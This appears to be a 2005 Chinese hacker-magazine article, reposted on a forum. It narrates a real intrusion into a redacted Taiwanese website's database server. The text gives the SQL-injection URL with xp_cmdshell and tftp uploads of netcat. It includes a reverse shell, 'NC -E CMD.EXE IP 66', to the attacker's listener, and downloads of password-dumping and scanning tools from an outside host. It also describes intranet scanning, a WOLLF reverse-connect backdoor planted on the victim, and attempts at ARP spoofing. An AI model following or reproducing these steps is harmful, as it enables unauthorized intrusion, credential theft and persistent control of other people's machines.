记一次艰苦的入侵
<DIV><FONT color=#f70909>图/文 勇哥儿</FONT></DIV><DIV><b></b> </DIV>
<DIV><B>本文已在黑客防线05</B><B>年第3</B><B>期发表</B></DIV>
<DIV>04年不平凡的一年,各种<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>相继发现,各种<a href="http://hackbase.com/hacker" target="_blank" >入侵</A><a href="http://hackbase.com/network/network" target="_blank" >技巧</A>也应运而生,原本固若金汤的机器,在新的<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>面前,也变的弱不禁风。牛人发现并编写的Serv-u的溢出程序,为提升系统权限大开方便之门,NBSI把SQL注入发挥的淋漓尽致,PHP注入也日趋成熟,哪位怪才发现的上传<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>在很多脚本中也都花样倍出,像DV,DZ等等大名鼎鼎的<a href="http://bbs.hackbase.com/" target="_blank" >论坛</A>也是<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>叠报,数家著名公司被敲诈,黑客组织也是明争暗斗,虚拟主机也饱受旁注困扰。攻与防就像矛与盾,从某种意义上来说,攻就是防,防就是攻!</DIV>
<DIV>“千里之堤,溃于蚁穴”,一个小小的<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>就可以攻克一台机器,甚至占领整个内部网络。本文以一台机器为突破口,然后如何利用内网其它机器做跳板,最后控制目标机器(如果说利用一台机器上的某个站点来控制其它站点叫直接旁注的话,偶想把利用同一网内最弱的一台机器,来达到控制最强的机器叫问接旁注,比渗透<a href="http://hackbase.com/hacker" target="_blank" >入侵</A>偶觉着好听点,其实方法很多牛人早用烂了,偶在这里现丑了)。</DIV>
<DIV>一、通过SQL注入<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>,反向连接<a href="http://hackbase.com/hacker" target="_blank" >数据库</A>机器。</DIV>
<DIV>利用NBSI扫描发现存在SQL注入<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>,而且还是SA权限,如图1</DIV>
<DIV><IMG src="http://hackbase.com/UpLoadFiles/NewsPhoto/00503171.JPG" border=0>
图1</DIV>
<DIV>利用NBSI的DOS执行命令,输入ipconfig –all 发现网址与WEB<a href="http://vip.hackbase.com/" target="_blank" >服务</A>器不同,但是从网关上来看是在同一网段内。执行netstat –an查看<a href="http://hackbase.com/hacker" target="_blank" >数据库</A><a href="http://vip.hackbase.com/" target="_blank" >服务</A>器所开的端口,发现很多1433端口都是WEB<a href="http://vip.hackbase.com/" target="_blank" >服务</A>器连接,21,23,80端口没!利用NBSI的浏览目录功能,没发现机器上存在PCANYWHERE和SERV-U(利用它们可以远程控制,提升权限,或猜测口令)。利用net start 命令没发现如瑞星,KV等杀毒<a href="http://down.hackbase.com/" target="_blank" >软件</A>或<a href=" target="_blank" >_</A>blank"><a href="http://hackbase.com/hacker" target="_blank" >防火墙</A></A><a href="http://vip.hackbase.com/" target="_blank" >服务</A>,然后利用HSCAN1。2和NMAP3。7扫描<a href="http://hackbase.com/hacker" target="_blank" >数据库</A><a href="http://vip.hackbase.com/" target="_blank" >服务</A>器的外网IP进,竟然没扫到一个开放的端口!(估计机器上装了硬件<a href=" target="_blank" >_</A>blank"><a href="http://hackbase.com/hacker" target="_blank" >防火墙</A></A>!)对付<a href=" target="_blank" >_</A>blank"><a href="http://hackbase.com/hacker" target="_blank" >防火墙</A></A>,偶想到了反向链接,在本地开了一个TFTP,利用命令, tftp –I ip get nc.exe 很幸运的上传了一个NC上去,利用同样的方法也上传了一个MT。EXE(MT.EXE是一个网络管理方面的<a href="http://down.hackbase.com/" target="_blank" >软件</A>,依照yy3的说法,也就是 "七拼八凑来的,纯粹是图个方便。"可是这个方便个真的是太方便了,仅40K的一个程序,但是集合了近四十种的命令于一身)上去。也可以利用FTP命令,把FTP命令用ECHO命令写进一个文件里面,最后在用FTP –S:FILENAME来实现文件的下载。在本机利用NC监听66端口,命令如下:NC –L –P 66 ,远程机器上执行:NC –E CMD。EXE IP 66不一会儿,一个SHELL就出来了(还是在这里面运行命令爽啊,在NBSI里憋死了,有时在NBSI里执行命令时会出现“意外数据”,还要被破在游览器里执行<a href=" target="_blank" >_</A>cmdshell%20'dos">http://www.***.com.tw/***/***.asp? mode=1&ID=256;exec%20master..xp<a href="http://hackbase.com/hacker/tutorial/2005031710472.html#" target="_blank" >_</A>cmdshell%20'dos</A> command';--)利用net view 命令查看共有三台机器!如图2 </DIV>
<DIV><IMG src="http://hackbase.com/UpLoadFiles/NewsPhoto/00503172.JPG" border=0>
图2</DIV>
<DIV>在利用命令:NET VIEW <a>\\机器名</A> 时得到的内容为空,看来是没共享目录啊!
二、上传反弹、监听<a href="http://hackbase.com/hacker" target="_blank" >木马</A>显奇功。</DIV>
<DIV>利用MT。EXE –SYSINFO命令显示出<a href="http://hackbase.com/hacker" target="_blank" >数据库</A><a href="http://vip.hackbase.com/" target="_blank" >服务</A>的系统信息,网卡信息,配置信息,和所安装的<a href="http://down.hackbase.com/" target="_blank" >软件</A>信息。如图3(只截了系统信息)</DIV>
<DIV><IMG src="http://hackbase.com/UpLoadFiles/NewsPhoto/00503173.JPG" border=0>
</DIV>
<DIV>图3</DIV>
<DIV>是WIN2003怪不得用MT –FINDPASS命令没显出<a href="http://hackbase.com/hacker" target="_blank" >密码</A>来,它只显示的<a href="http://hackbase.com/skill" target="_blank" >2K</A>的<a href="http://hackbase.com/hacker" target="_blank" >密码</A>。利用命令mt –netget http://www.***.com/findpass2003.exe(mt -netget <url> <filename to saved> ---Download from http/ftp.)下载到本地一个看WIN2003<a href="http://hackbase.com/hacker" target="_blank" >密码</A>的<a href="http://down.hackbase.com/" target="_blank" >软件</A>!!运行findpass2003.exe后没有在内存中找到<a href="http://hackbase.com/hacker" target="_blank" >密码</A>!(看来的想办法让管理员登录了!哈哈)</DIV>
<DIV>运行命令: mt –netget <a href="http://www.***.com/hacan120.rar" target="_blank" >http://www.***.com/hacan120.rar</A> hscan.rar 下载一个HSCAN1。2进去,利用同样的方法又下载进去一个UNRAR。EXE然后执行命令:unrar.exe x hscan.rar 这样就把HSCAN。RAR解压到HSCAN目录当中了!可以利用HACSN1。2版本的DOS命令进行内网扫描,命令如下:hscan -h www.target.com -all –ping扫完其余两台以后没发现任何弱口令,但发现它们在内网中开了很多端口,如:21,80,135,139,3389 等</DIV>
<DIV>注意:HSCAN扫描完了以后,会生成报告,自动用浏览器打开,应该利用MT –PSLIST 和MT –PSKILL把这个浏览器关掉!</DIV>
<DIV>即然开了3389能不能利用端口重定向,把它定向到<a href="http://hackbase.com/hacker" target="_blank" >数据库</A>这台机器上呢,经过实践利用mt -redirect <TargetIP> <TargetPort> <ListenPort> ----TCP port redirector. 和利用FPIPE都没有成功(定向后,用NETSTAT –AN命令看是端向成功,但是在外网还是没法访问)哪<a href="http://hackbase.com/hacker" target="_blank" >数据库</A>这台机器能不能利用带反弹型的图形<a href="http://hackbase.com/hacker" target="_blank" >木马</A>来控制屏幕呢?实践证明利用神气儿,灰鸽子,溯雪都失败了!看来只能装DOS版的后门了,哪试试APR欺骗如何?因在DOS下没法安装图形界面的WINPCAP,所以ARPSINFFER。EXE无法运行!(后来自己做了一个DOS版的)</DIV>
<DIV>这台机器上除了操作系统,<a href="http://hackbase.com/hacker" target="_blank" >数据库</A>,WIN2003补丁外什么都没装,难道真的就没有办法了吗?这时偶想到了一个<a href="http://hackbase.com/hacker" target="_blank" >木马</A>,一个女黑客编写的,即有反向连接功能,又有监听功能,是什么呢?聪明的朋友,你猜到了吗?她就是大名鼎鼎,如雷贯耳,威名远波,无所不知的WOLLF(偶好喜欢她啊! 哈哈)运行WOLLF –SETUP后做一个反向链接的<a href="http://hackbase.com/hacker" target="_blank" >木马</A>,偶选择的是反向链接所取的IP放在一个HTTP空间的文件中!制作好后,同样利用MT。EXE –NETGET命令下载到<a href="http://hackbase.com/hacker" target="_blank" >数据库</A><a href="http://vip.hackbase.com/" target="_blank" >服务</A>器当中,运行后,它会自动向你的HTTP空间中存放的文件中去取反向链接的IP和端口,这时你可以在本机上用NC –L –P PORT 慢慢等待,一会以后,反向连接成功了,输<a href="http://hackbase.com/hacker" target="_blank" >密码</A>进入吧!如图4</DIV>
<DIV><IMG src="http://hackbase.com/UpLoadFiles/NewsPhoto/00503174.JPG" border=0>
图4</DIV> 牛。 牛人!!!
页:
[1]